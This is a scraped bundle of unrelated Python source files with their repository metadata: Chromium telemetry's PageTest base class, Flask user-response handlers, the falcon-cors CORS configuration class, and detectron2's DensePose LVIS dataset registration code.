"alnum_prop": 0.5660311352107749,
"repo_name": "bfroehle/pydzipimport",
"id": "f8992a482d23de3a90915085ec3b1007c293a3ad",
"size": "5717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_pydzipimport.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "100643"
},
{
"name": "Python",
"bytes": "12828"
}
],
"symlink_target": ""
} |
import logging
from telemetry.core import exceptions
from telemetry.page import action_runner as action_runner_module
class TestNotSupportedOnPlatformError(Exception):
"""PageTest Exception raised when a required feature is unavailable.
The feature required to run the test could be part of the platform,
hardware configuration, or browser.
"""
class MultiTabTestAppCrashError(Exception):
"""PageTest Exception raised after browser or tab crash for multi-tab tests.
Used to abort the test rather than try to recover from an unknown state.
"""
class Failure(Exception):
"""PageTest Exception raised when an undesired but designed-for problem."""
class MeasurementFailure(Failure):
"""PageTest Exception raised when an undesired but designed-for problem."""
class PageTest(object):
"""A class styled on unittest.TestCase for creating page-specific tests.
Test should override ValidateAndMeasurePage to perform test
validation and page measurement as necessary.
class BodyChildElementMeasurement(PageTest):
def ValidateAndMeasurePage(self, page, tab, results):
body_child_count = tab.EvaluateJavaScript(
'document.body.children.length')
results.AddValue(scalar.ScalarValue(
page, 'body_children', 'count', body_child_count))
Args:
    discard_first_result: Discard the first run of this page. This is
usually used with page_repeat and pageset_repeat options.
"""
def __init__(self,
needs_browser_restart_after_each_page=False,
discard_first_result=False,
clear_cache_before_each_run=False):
super(PageTest, self).__init__()
self.options = None
self._needs_browser_restart_after_each_page = (
needs_browser_restart_after_each_page)
self._discard_first_result = discard_first_result
self._clear_cache_before_each_run = clear_cache_before_each_run
self._close_tabs_before_run = True
@property
def is_multi_tab_test(self):
"""Returns True if the test opens multiple tabs.
If the test overrides TabForPage, it is deemed a multi-tab test.
    Multi-tab tests do not retry after tab or browser crashes, whereas
    single-tab tests do. That is because the state of multi-tab tests
(e.g., how many tabs are open, etc.) is unknown after crashes.
"""
return self.TabForPage.__func__ is not PageTest.TabForPage.__func__
@property
def discard_first_result(self):
"""When set to True, the first run of the test is discarded. This is
useful for cases where it's desirable to have some test resource cached so
the first run of the test can warm things up. """
return self._discard_first_result
@discard_first_result.setter
def discard_first_result(self, discard):
self._discard_first_result = discard
@property
def clear_cache_before_each_run(self):
"""When set to True, the browser's disk and memory cache will be cleared
before each run."""
return self._clear_cache_before_each_run
@property
def close_tabs_before_run(self):
"""When set to True, all tabs are closed before running the test for the
first time."""
return self._close_tabs_before_run
@close_tabs_before_run.setter
def close_tabs_before_run(self, close_tabs):
self._close_tabs_before_run = close_tabs
def RestartBrowserBeforeEachPage(self):
""" Should the browser be restarted for the page?
This returns true if the test needs to unconditionally restart the
browser for each page. It may be called before the browser is started.
"""
return self._needs_browser_restart_after_each_page
def StopBrowserAfterPage(self, browser, page): # pylint: disable=W0613
"""Should the browser be stopped after the page is run?
This is called after a page is run to decide whether the browser needs to
be stopped to clean up its state. If it is stopped, then it will be
restarted to run the next page.
A test that overrides this can look at both the page and the browser to
decide whether it needs to stop the browser.
"""
return False
def CustomizeBrowserOptions(self, options):
"""Override to add test-specific options to the BrowserOptions object"""
def WillStartBrowser(self, platform):
"""Override to manipulate the browser environment before it launches."""
def DidStartBrowser(self, browser):
"""Override to customize the browser right after it has launched."""
def SetOptions(self, options):
"""Sets the BrowserFinderOptions instance to use."""
self.options = options
def WillNavigateToPage(self, page, tab):
"""Override to do operations before the page is navigated, notably Telemetry
will already have performed the following operations on the browser before
calling this function:
* Ensure only one tab is open.
* Call WaitForDocumentReadyStateToComplete on the tab."""
def DidNavigateToPage(self, page, tab):
"""Override to do operations right after the page is navigated and after
all waiting for completion has occurred."""
def DidRunPage(self, platform):
"""Called after the test run method was run, even if it failed."""
def TabForPage(self, page, browser): # pylint: disable=W0613
"""Override to select a different tab for the page. For instance, to
create a new tab for every page, return browser.tabs.New()."""
try:
return browser.tabs[0]
    # The tab may have gone away in some cases, so we create a new tab and retry
# (See crbug.com/496280)
except exceptions.DevtoolsTargetCrashException as e:
logging.error('Tab may have crashed: %s' % str(e))
browser.tabs.New()
# See comment in shared_page_state.WillRunStory for why this waiting
# is needed.
browser.tabs[0].WaitForDocumentReadyStateToBeComplete()
return browser.tabs[0]
def ValidateAndMeasurePage(self, page, tab, results):
"""Override to check test assertions and perform measurement.
When adding measurement results, call results.AddValue(...) for
each result. Raise an exception or add a failure.FailureValue on
failure. page_test.py also provides several base exception classes
to use.
Prefer metric value names that are in accordance with python
variable style. e.g., metric_name. The name 'url' must not be used.
Put together:
def ValidateAndMeasurePage(self, page, tab, results):
res = tab.EvaluateJavaScript('2+2')
if res != 4:
raise Exception('Oh, wow.')
results.AddValue(scalar.ScalarValue(
page, 'two_plus_two', 'count', res))
Args:
page: A telemetry.page.Page instance.
tab: A telemetry.core.Tab instance.
results: A telemetry.results.PageTestResults instance.
"""
raise NotImplementedError
# Deprecated: do not use this hook. (crbug.com/470147)
def RunNavigateSteps(self, page, tab):
"""Navigates the tab to the page URL attribute.
Runs the 'navigate_steps' page attribute as a compound action.
"""
action_runner = action_runner_module.ActionRunner(
tab, skip_waits=page.skip_waits)
page.RunNavigateSteps(action_runner)
| {
"content_hash": "8ef2f9dd98140de1126446c1c09e396b",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 80,
"avg_line_length": 36.85128205128205,
"alnum_prop": 0.7086000556637907,
"repo_name": "Pluto-tv/chromium-crosswalk",
"id": "575c08c86a7c78c908e9ab9d3789f578a4c5ea67",
"size": "7349",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/telemetry/telemetry/page/page_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "37073"
},
{
"name": "Batchfile",
"bytes": "8451"
},
{
"name": "C",
"bytes": "9548418"
},
{
"name": "C++",
"bytes": "244899104"
},
{
"name": "CSS",
"bytes": "946931"
},
{
"name": "DM",
"bytes": "60"
},
{
"name": "Groff",
"bytes": "2494"
},
{
"name": "HTML",
"bytes": "27337866"
},
{
"name": "Java",
"bytes": "15149798"
},
{
"name": "JavaScript",
"bytes": "20716348"
},
{
"name": "Makefile",
"bytes": "70864"
},
{
"name": "Objective-C",
"bytes": "1764480"
},
{
"name": "Objective-C++",
"bytes": "10068706"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "PLpgSQL",
"bytes": "178732"
},
{
"name": "Perl",
"bytes": "63937"
},
{
"name": "Protocol Buffer",
"bytes": "486852"
},
{
"name": "Python",
"bytes": "8518224"
},
{
"name": "Shell",
"bytes": "486537"
},
{
"name": "Standard ML",
"bytes": "5106"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "18347"
}
],
"symlink_target": ""
} |
""".
This is the info messages file; it contains all the info messages for the service.
"""
from flask import jsonify
from core.handlers.common_handlers import base_response, base_response_token
from core.handlers.common_handlers import base_response_user
from core.messages import successful_messages as info
from flask_api import status
def correct_login(auth_token):
"""Return a json response with the description and http status 200."""
return base_response_token(info.SUCCESS_HANDLER,
info.USER_LOGIN_OK,
status.HTTP_200_OK,
auth_token)
def correct_register(auth_token):
"""Return a json response with the description and http status 201."""
return base_response_token(info.SUCCESS_HANDLER,
info.USER_REGISTER_OK,
status.HTTP_201_CREATED,
auth_token)
def correct_logout():
"""Return a json response with the description and http status 200."""
return base_response(info.SUCCESS_HANDLER,
info.USER_LOGOUT_OK,
status.HTTP_200_OK)
def user_status(user):
"""Return a json response with the description and http status 200."""
return base_response_user(info.SUCCESS_HANDLER,
status.HTTP_200_OK,
user)
def user_created(email):
"""Return a json response with the description and http status 201."""
return base_response(info.SUCCESS_HANDLER,
email + info.USER_ADD_OK,
status.HTTP_201_CREATED)
def user_updated():
"""Return a json response with the description and http status 200."""
return base_response(info.SUCCESS_HANDLER,
info.USER_UPDATE_OK,
status.HTTP_200_OK)
def user_read(user):
"""Return a json response with the description and http status 200."""
return base_response_user(info.SUCCESS_HANDLER,
status.HTTP_202_ACCEPTED,
user)
def user_read_all(users):
"""Return a json response with the users list and sucess status."""
users_list = []
for user in users.items:
user_object = {
'id': user.id,
'username': user.username,
'email': user.email,
'registered_on': user.registered_on,
'is_active': user.is_active,
'is_admin': user.is_admin
}
users_list.append(user_object)
response_object = {
'status': 'success',
'data': {
'users': users_list
}
}
return jsonify(response_object), status.HTTP_200_OK
| {
"content_hash": "4a189d3aaa2cb7a772ed49ca03d82061",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 76,
"avg_line_length": 33.13095238095238,
"alnum_prop": 0.5749191519942508,
"repo_name": "pcu4dros/pandora-core",
"id": "28f423c23c1c62803ab657553e422c8896c1d130",
"size": "2783",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/handlers/info_handlers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "39286"
},
{
"name": "CSS",
"bytes": "14990"
},
{
"name": "HTML",
"bytes": "45691"
},
{
"name": "JavaScript",
"bytes": "2777334"
},
{
"name": "Mako",
"bytes": "8969"
},
{
"name": "Python",
"bytes": "10773740"
},
{
"name": "Shell",
"bytes": "3310"
}
],
"symlink_target": ""
} |
"""
This module implements the configuration for handling CORS requests.
"""
import logging
import re
try:
from falcon import HTTP_METHODS
except ImportError:
from falcon import status_codes as HTTP_METHODS
from .middleware import CORSMiddleware
from .log import get_default_logger
class CORS(object):
"""
Initialize a CORS object, passing in configuration options.
All of the configuration settings are optional, however if none
of them are specified the default configuration will simply
deny all CORS requests. You can pass this to
:py:class:`~falcon.api.API` for a global configuration.
After enabling globally, you can override the settings for a
particular resource by setting the 'cors' attribute on it to
an instance of this class.
Args:
logger(:py:meth:`logging.Logger`, optional):
Specifies the logger to use. A basic logger and StreamHandler
            will be configured for you if none is provided.
allow_all_origins(bool, optional): Specifies whether CORS
should allow requests from all origins. Default is ``False``.
allow_origins_list(list, optional): A list of
origins that are allowed to make CORS requests. Default is empty.
allow_origins_regex(str, optional): A string containing
a Python regular expression that matches origins which
are allowed to make CORS requests. Default is ``None``.
allow_all_headers(bool, optional): If ``True``, when the server is
responding to a preflight request it will approve any headers
requested by the client via the Access-Control-Request-Headers
header, setting each requested header in the
value of the Access-Control-Allow-Headers header in the response.
Default is ``False``.
allow_headers_list(list, optional): A list of headers which are
allowed values for the Access-Control-Allow-Headers header
in response to a preflight request. When the server is
responding to a preflight request, it will check each header
requested by the client in the Access-Control-Request-Headers
header to see if it exists in this list. If it does, it
will be included in the Access-Control-Allow-Headers header
in the response to the preflight request.
Default is empty.
allow_headers_regex(str, optional): A string containing a Python
regular expression that matches headers that should be
allowed in response to a preflight request. If this is set,
when a preflight request is received by the server, it will
try to match each header requested by the client via the
Access-Control-Request-Headers header of the request. If
the requested header is matched by this regex, it will be
included in the value of the Access-Control-Allow-Headers
header of the response.
expose_headers_list(list, optional): A list of headers that
should be sent as values to the Access-Control-Expose-Headers
header in response to simple or actual requests.
allow_all_methods(bool, optional): Specifies whether all methods
are allowed via CORS requests. Default is ``False``.
allow_methods_list(list, optional): A list of methods which are
allowed via CORS requests. These should be values from
``falcon.HTTP_METHODS``, which are strings like 'GET' and 'PATCH'.
Default is empty.
        allow_credentials_all_origins(bool, optional): Whether or not the
Access-Control-Allow-Credentials should be set to True
and set on all responses. Default is ``False``.
allow_credentials_origins_list(list, optional): A list of
origins for which the Access-Control-Allow-Credentials
header should be set to True and included with all
responses. Default is empty.
allow_credentials_origins_regex(string, optional): A string
containing a Python regular expression matching origins
for which the Access-Control-Allow-Credentials header
should be set to True and included in all responses.
Default is ``None``.
max_age(int, optional): If set to an integer, this value
will be used as the value of the Access-Control-Max-Age
header in response to preflight requests. This is
in seconds the maximum amount of time a client may cache
responses to preflight requests.
Default is ``None`` (no header sent).
Note:
        The arguments above are inclusive, meaning a header, origin, or method
will only be disallowed if it doesn't match ANY specification.
First the allow_all directive is checked, then the list directive,
then the regex directive if applicable, then list by method if applicable,
and lastly regex by method if applicable. For instance, this means if
you specify 'Auth-Key' in allow_headers_list, it will be allowed for all
methods regardless of the values in header_list_By_method.
Note:
Headers are converted to lower-case for you.
Methods are converted to upper-case for you.
Take note of this if you are writing regular expressions.
Note:
The allow_headers_* settings relate to the Access-Control-Allow-Headers
header which is only sent in response to pre-flight requests.
This is different from the Access-Control-Expose-Headers header which
is set via the expose_headers_list setting and is sent only in response
to basic or actual requests.
Warning:
Exercise caution when using the regex enabled settings. It is very
easy to misunderstand Python regex syntax and accidentally
introduce an unintentionally allowed origin or other vulnerability
into your application.
"""
def __init__(self, **cors_config):
default_cors_config = {
'logger': get_default_logger(),
            'log_level': None,
'allow_all_origins': False,
'allow_origins_list': [],
'allow_origins_regex': None,
'allow_all_headers': False,
'allow_headers_list': [],
'allow_headers_regex': None,
'expose_headers_list': [],
'allow_all_methods': False,
'allow_methods_list': [],
'allow_credentials_all_origins': False,
'allow_credentials_origins_list': [],
'allow_credentials_origins_regex': None,
'max_age': None
}
for cors_setting, setting_value in default_cors_config.items():
cors_config.setdefault(cors_setting, setting_value)
unknown_settings = list(set(cors_config.keys()) -
set(default_cors_config.keys()))
if unknown_settings:
raise ValueError(
'Unknown CORS settings: {0}'.format(unknown_settings))
self.logger = cors_config["logger"]
if cors_config["log_level"] is not None:
level = logging.getLevelName(cors_config["log_level"])
self.logger.setLevel(level)
unknown_methods = list(set(
cors_config['allow_methods_list']) - set(HTTP_METHODS))
if unknown_methods:
raise ValueError(
'Unknown methods specified for '
'allow_methods_list: {0}'.format(unknown_methods))
self._compile_keys(
cors_config,
[
'allow_origins_regex', 'allow_headers_regex',
'allow_credentials_origins_regex'
])
cors_config['allow_methods_list'] = [
method.upper() for method in cors_config['allow_methods_list']
]
for header_list_key in ['allow_headers_list', 'expose_headers_list']:
cors_config[header_list_key] = [
header.lower() for header in cors_config[header_list_key]
]
        # We need to detect if we support credentials; if we do,
# we cannot set Access-Control-Allow-Origin to *
self.supports_credentials = False
for credentials_key in [
'allow_credentials_all_origins',
'allow_credentials_origins_list',
'allow_credentials_origins_regex'
]:
if cors_config[credentials_key]:
self.supports_credentials = True
self.logger.debug(
"supports_credentials: {0}".format(
self.supports_credentials
)
)
# Detect if we need to send 'Vary: Origin' header
# This needs to be set if any decisions about which headers to send
# are being made based on the Origin header the client sends
self.origins_vary = False
if cors_config['allow_all_origins']:
for vary_origin_config_key in [
'allow_credentials_origins_list',
'allow_credentials_origins_regex'
]:
if cors_config[vary_origin_config_key]:
self.origins_vary = True
self.logger.debug(
"origins_vary {0}".format(
self.origins_vary
)
)
self._cors_config = cors_config
def _compile_keys(self, settings_dict, keys):
for key in keys:
if settings_dict[key] is not None:
settings_dict[key] = re.compile(settings_dict[key])
@property
def middleware(self):
"""A property which returns a CORSMiddleware instance"""
return CORSMiddleware(self)
def process(self, req, resp, resource):
# Comments in this section will refer to sections of the W3C
# specification for CORS, most notably 6.1.X and 6.2.X which are
# lists of steps a server should take when responding to CORS
# requests: http://www.w3.org/TR/cors/#resource-processing-model
# According to the spec, it is OK for steps to take place out of
# order, as long as the end result is indistinguishable from the
# reference algorithm specified in the W3C document. (Section 2)
# For efficiency and code structure, some steps may take place
# out of order, although we try our best to stick to the order
# of steps specified in Section 6.1 and 6.2
# We must always set 'Vary: Origin' even if the Origin header is not set;
# otherwise cache servers in front of the app (e.g. Varnish) will cache
# this response
if self.origins_vary:
self._set_vary_origin(resp)
origin = req.get_header('origin')
# 6.1.1
# 6.2.1
if not origin:
self.logger.debug("Aborting response due to no origin header")
return
# 6.1.2
# 6.1.3 (Access-Control-Allow-Origin)
# 6.2.2
# 6.2.7 (Access-Control-Allow-Origin)
if not self._process_origin(req, resp, origin):
self.logger.info("Aborting response due to origin not allowed")
return
# Basic or actual request
if req.method != 'OPTIONS':
self.logger.debug("Processing basic or actual request")
# 6.1.3 (Access-Control-Allow-Credentials)
self._process_credentials(req, resp, origin)
# 6.1.4
self._process_expose_headers(req, resp)
# Preflight request
else:
self.logger.debug("Processing preflight request")
request_method = req.get_header('access-control-request-method')
# 6.2.3
if not request_method:
self.logger.info(
"Aborting response due to no access-control-request-method header"
)
return
# 6.2.4
requested_header_list = self._get_requested_headers(req)
# 6.2.5
# 6.2.9
if not self._process_methods(req, resp, resource):
self.logger.info("Aborting response due to unallowed method")
return
# 6.2.6
# 6.2.10
if not self._process_allow_headers(req, resp, requested_header_list):
self.logger.info("Aborting response due to unallowed headers")
return
# 6.2.7 (Access-Control-Allow-Credentials)
self._process_credentials(req, resp, origin)
# 6.2.8
self._process_max_age(req, resp)
def _process_origin(self, req, resp, origin):
"""Inspects the request and adds the Access-Control-Allow-Origin
header if the requested origin is allowed.
Returns:
``True`` if the header was added and the requested origin
is allowed, ``False`` if the origin is not allowed and the
header has not been added.
"""
if self._cors_config['allow_all_origins']:
if self.supports_credentials:
self._set_allow_origin(resp, origin)
else:
self._set_allow_origin(resp, '*')
return True
if origin in self._cors_config['allow_origins_list']:
self._set_allow_origin(resp, origin)
return True
regex = self._cors_config['allow_origins_regex']
if regex is not None:
if regex.match(origin):
self._set_allow_origin(resp, origin)
return True
return False
def _process_allow_headers(self, req, resp, requested_headers):
"""Adds the Access-Control-Allow-Headers header to the response,
using the cors settings to determine which headers are allowed.
Returns:
``True`` if all the headers the client requested are allowed.
``False`` if one or more of the requested headers is not allowed.
"""
if not requested_headers:
return True
elif self._cors_config['allow_all_headers']:
self._set_allowed_headers(resp, requested_headers)
return True
approved_headers = []
for header in requested_headers:
if header.lower() in self._cors_config['allow_headers_list']:
approved_headers.append(header)
elif self._cors_config.get('allow_headers_regex'):
if self._cors_config['allow_headers_regex'].match(header):
approved_headers.append(header)
if len(approved_headers) == len(requested_headers):
self._set_allowed_headers(resp, approved_headers)
return True
return False
def _process_methods(self, req, resp, resource):
"""Adds the Access-Control-Allow-Methods header to the response,
using the cors settings to determine which methods are allowed.
"""
requested_method = self._get_requested_method(req)
if not requested_method:
return False
if self._cors_config['allow_all_methods']:
allowed_methods = self._get_resource_methods(resource)
self._set_allowed_methods(resp, allowed_methods)
if requested_method in allowed_methods:
return True
elif requested_method in self._cors_config['allow_methods_list']:
resource_methods = self._get_resource_methods(resource)
# Only list methods as allowed if they exist
# on the resource AND are in the allow_methods_list setting
allowed_methods = [
method for method in resource_methods
if method in self._cors_config['allow_methods_list']
]
self._set_allowed_methods(resp, allowed_methods)
if requested_method in allowed_methods:
return True
return False
def _get_resource_methods(self, resource):
allowed_methods = []
for method in HTTP_METHODS:
if (
hasattr(resource, 'on_' + method.lower()) or
resource is None
):
allowed_methods.append(method)
return allowed_methods
def _process_credentials(self, req, resp, origin):
"""Adds the Access-Control-Allow-Credentials to the response
if the cors settings indicates it should be set.
"""
if self._cors_config['allow_credentials_all_origins']:
self._set_allow_credentials(resp)
return True
if origin in self._cors_config['allow_credentials_origins_list']:
self._set_allow_credentials(resp)
return True
credentials_regex = self._cors_config['allow_credentials_origins_regex']
if credentials_regex:
if credentials_regex.match(origin):
self._set_allow_credentials(resp)
return True
return False
def _process_expose_headers(self, req, resp):
for header in self._cors_config['expose_headers_list']:
resp.append_header('access-control-expose-headers', header)
def _process_max_age(self, req, resp):
if self._cors_config['max_age']:
resp.set_header('access-control-max-age', self._cors_config['max_age'])
def _get_requested_headers(self, req):
headers = []
raw_header = req.get_header('access-control-request-headers')
if raw_header is None:
return headers
for requested_header in raw_header.split(','):
requested_header = requested_header.strip()
if requested_header:
headers.append(requested_header)
return headers
def _get_requested_method(self, req):
return req.get_header('access-control-request-method')
def _set_allow_origin(self, resp, allowed_origin):
resp.set_header('access-control-allow-origin', allowed_origin)
def _set_allowed_headers(self, resp, allowed_header_list):
for allowed_header in allowed_header_list:
resp.append_header('access-control-allow-headers', allowed_header)
def _set_allowed_methods(self, resp, allowed_methods):
for method in allowed_methods:
resp.append_header('access-control-allow-methods', method)
def _set_allow_credentials(self, resp):
resp.set_header('access-control-allow-credentials', 'true')
def _set_vary_origin(self, resp):
resp.append_header('vary', 'origin')
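# --- Usage sketch (illustrative only, not part of the original module) ------
# Shows how the settings documented above are typically wired into a Falcon
# app.  It assumes this class is exported as ``CORS`` and that a Falcon
# release providing ``falcon.App`` is installed; the origin, headers, methods
# and max_age below are example values.
if __name__ == '__main__':  # pragma: no cover
    import falcon

    example_cors = CORS(
        allow_origins_list=['https://example.com'],
        allow_all_headers=True,
        allow_methods_list=['GET', 'POST', 'OPTIONS'],
        max_age=3600,
    )
    # Every response from this app then carries the configured CORS headers,
    # added by the CORSMiddleware returned from the ``middleware`` property.
    app = falcon.App(middleware=[example_cors.middleware])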
| {
"content_hash": "7f49c1cc639af8386668503ca3e268ae",
"timestamp": "",
"source": "github",
"line_count": 456,
"max_line_length": 86,
"avg_line_length": 40.875,
"alnum_prop": 0.6118890498417298,
"repo_name": "lwcolton/falcon-cors",
"id": "d76cda46bc52c18c7057e43e20febb16f7f76bc2",
"size": "18639",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/falcon_cors/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "38260"
},
{
"name": "Shell",
"bytes": "622"
}
],
"symlink_target": ""
} |
import logging
import os
from typing import Any, Dict, Iterable, List, Optional
from fvcore.common.timer import Timer
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.data.datasets.lvis import get_lvis_instances_meta
from detectron2.structures import BoxMode
from detectron2.utils.file_io import PathManager
from ..utils import maybe_prepend_base_path
from .coco import (
DENSEPOSE_ALL_POSSIBLE_KEYS,
DENSEPOSE_METADATA_URL_PREFIX,
CocoDatasetInfo,
get_metadata,
)
DATASETS = [
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_train_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds1_train_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_val_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds1_val_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds2_train_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds2_train_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds2_val_v1",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_ds2_val_v1.json",
),
CocoDatasetInfo(
name="densepose_lvis_v1_ds1_val_animals_100",
images_root="coco_",
annotations_fpath="lvis/densepose_lvis_v1_val_animals_100_v2.json",
),
]
def _load_lvis_annotations(json_file: str):
"""
Load LVIS annotations from a JSON file
Args:
json_file: str
Path to the file to load annotations from
Returns:
Instance of `lvis.LVIS` that provides access to annotations
data
"""
from lvis import LVIS
json_file = PathManager.get_local_path(json_file)
logger = logging.getLogger(__name__)
timer = Timer()
lvis_api = LVIS(json_file)
if timer.seconds() > 1:
logger.info("Loading {} takes {:.2f} seconds.".format(json_file, timer.seconds()))
return lvis_api
def _add_categories_metadata(dataset_name: str) -> None:
metadict = get_lvis_instances_meta(dataset_name)
categories = metadict["thing_classes"]
metadata = MetadataCatalog.get(dataset_name)
metadata.categories = {i + 1: categories[i] for i in range(len(categories))}
logger = logging.getLogger(__name__)
logger.info(f"Dataset {dataset_name} has {len(categories)} categories")
def _verify_annotations_have_unique_ids(json_file: str, anns: List[List[Dict[str, Any]]]) -> None:
ann_ids = [ann["id"] for anns_per_image in anns for ann in anns_per_image]
assert len(set(ann_ids)) == len(ann_ids), "Annotation ids in '{}' are not unique!".format(
json_file
)
def _maybe_add_bbox(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "bbox" not in ann_dict:
return
obj["bbox"] = ann_dict["bbox"]
obj["bbox_mode"] = BoxMode.XYWH_ABS
def _maybe_add_segm(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "segmentation" not in ann_dict:
return
segm = ann_dict["segmentation"]
if not isinstance(segm, dict):
# filter out invalid polygons (< 3 points)
segm = [poly for poly in segm if len(poly) % 2 == 0 and len(poly) >= 6]
if len(segm) == 0:
return
obj["segmentation"] = segm
def _maybe_add_keypoints(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
if "keypoints" not in ann_dict:
return
keypts = ann_dict["keypoints"] # list[int]
for idx, v in enumerate(keypts):
if idx % 3 != 2:
# COCO's segmentation coordinates are floating points in [0, H or W],
# but keypoint coordinates are integers in [0, H-1 or W-1]
# Therefore we assume the coordinates are "pixel indices" and
# add 0.5 to convert to floating point coordinates.
keypts[idx] = v + 0.5
obj["keypoints"] = keypts
def _maybe_add_densepose(obj: Dict[str, Any], ann_dict: Dict[str, Any]) -> None:
for key in DENSEPOSE_ALL_POSSIBLE_KEYS:
if key in ann_dict:
obj[key] = ann_dict[key]
def _combine_images_with_annotations(
dataset_name: str,
image_root: str,
img_datas: Iterable[Dict[str, Any]],
ann_datas: Iterable[Iterable[Dict[str, Any]]],
):
dataset_dicts = []
def get_file_name(img_root, img_dict):
# Determine the path including the split folder ("train2017", "val2017", "test2017") from
# the coco_url field. Example:
# 'coco_url': 'http://images.cocodataset.org/train2017/000000155379.jpg'
split_folder, file_name = img_dict["coco_url"].split("/")[-2:]
return os.path.join(img_root + split_folder, file_name)
for img_dict, ann_dicts in zip(img_datas, ann_datas):
record = {}
record["file_name"] = get_file_name(image_root, img_dict)
record["height"] = img_dict["height"]
record["width"] = img_dict["width"]
record["not_exhaustive_category_ids"] = img_dict.get("not_exhaustive_category_ids", [])
record["neg_category_ids"] = img_dict.get("neg_category_ids", [])
record["image_id"] = img_dict["id"]
record["dataset"] = dataset_name
objs = []
for ann_dict in ann_dicts:
assert ann_dict["image_id"] == record["image_id"]
obj = {}
_maybe_add_bbox(obj, ann_dict)
obj["iscrowd"] = ann_dict.get("iscrowd", 0)
obj["category_id"] = ann_dict["category_id"]
_maybe_add_segm(obj, ann_dict)
_maybe_add_keypoints(obj, ann_dict)
_maybe_add_densepose(obj, ann_dict)
objs.append(obj)
record["annotations"] = objs
dataset_dicts.append(record)
return dataset_dicts
def load_lvis_json(annotations_json_file: str, image_root: str, dataset_name: str):
"""
Loads a JSON file with annotations in LVIS instances format.
Replaces `detectron2.data.datasets.coco.load_lvis_json` to handle metadata
in a more flexible way. Postpones category mapping to a later stage to be
able to combine several datasets with different (but coherent) sets of
categories.
Args:
annotations_json_file: str
Path to the JSON file with annotations in LVIS instances format.
image_root: str
directory that contains all the images
dataset_name: str
the name that identifies a dataset, e.g. "densepose_coco_2014_train"
"""
lvis_api = _load_lvis_annotations(PathManager.get_local_path(annotations_json_file))
_add_categories_metadata(dataset_name)
# sort indices for reproducible results
img_ids = sorted(lvis_api.imgs.keys())
# imgs is a list of dicts, each looks something like:
# {'license': 4,
# 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg',
# 'file_name': 'COCO_val2014_000000001268.jpg',
# 'height': 427,
# 'width': 640,
# 'date_captured': '2013-11-17 05:57:24',
# 'id': 1268}
imgs = lvis_api.load_imgs(img_ids)
logger = logging.getLogger(__name__)
logger.info("Loaded {} images in LVIS format from {}".format(len(imgs), annotations_json_file))
# anns is a list[list[dict]], where each dict is an annotation
# record for an object. The inner list enumerates the objects in an image
# and the outer list enumerates over images.
anns = [lvis_api.img_ann_map[img_id] for img_id in img_ids]
_verify_annotations_have_unique_ids(annotations_json_file, anns)
dataset_records = _combine_images_with_annotations(dataset_name, image_root, imgs, anns)
return dataset_records
def register_dataset(dataset_data: CocoDatasetInfo, datasets_root: Optional[str] = None) -> None:
"""
Registers provided LVIS DensePose dataset
Args:
dataset_data: CocoDatasetInfo
Dataset data
datasets_root: Optional[str]
Datasets root folder (default: None)
"""
annotations_fpath = maybe_prepend_base_path(datasets_root, dataset_data.annotations_fpath)
images_root = maybe_prepend_base_path(datasets_root, dataset_data.images_root)
def load_annotations():
return load_lvis_json(
annotations_json_file=annotations_fpath,
image_root=images_root,
dataset_name=dataset_data.name,
)
DatasetCatalog.register(dataset_data.name, load_annotations)
MetadataCatalog.get(dataset_data.name).set(
json_file=annotations_fpath,
image_root=images_root,
evaluator_type="lvis",
**get_metadata(DENSEPOSE_METADATA_URL_PREFIX),
)
def register_datasets(
datasets_data: Iterable[CocoDatasetInfo], datasets_root: Optional[str] = None
) -> None:
"""
Registers provided LVIS DensePose datasets
Args:
datasets_data: Iterable[CocoDatasetInfo]
An iterable of dataset datas
datasets_root: Optional[str]
Datasets root folder (default: None)
"""
for dataset_data in datasets_data:
register_dataset(dataset_data, datasets_root)
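# --- Usage sketch (illustrative only) ----------------------------------------
# Registers the DATASETS declared above and pulls the combined records through
# detectron2's DatasetCatalog.  The "datasets" root directory is an assumed
# local path used only for this example.
if __name__ == "__main__":
    register_datasets(DATASETS, datasets_root="datasets")
    # DatasetCatalog.get() invokes load_lvis_json() for the requested name.
    records = DatasetCatalog.get("densepose_lvis_v1_ds1_val_v1")
    print(f"Loaded {len(records)} image records")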
| {
"content_hash": "d369af6eb8aba2e696c478d48db14ed6",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 99,
"avg_line_length": 36.00390625,
"alnum_prop": 0.6432678745795812,
"repo_name": "facebookresearch/detectron2",
"id": "b4af9fa292f445c81dc840ab53d07c1af313dfc7",
"size": "9268",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "projects/DensePose/densepose/data/datasets/lvis.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "79417"
},
{
"name": "CMake",
"bytes": "616"
},
{
"name": "Cuda",
"bytes": "112955"
},
{
"name": "Dockerfile",
"bytes": "3209"
},
{
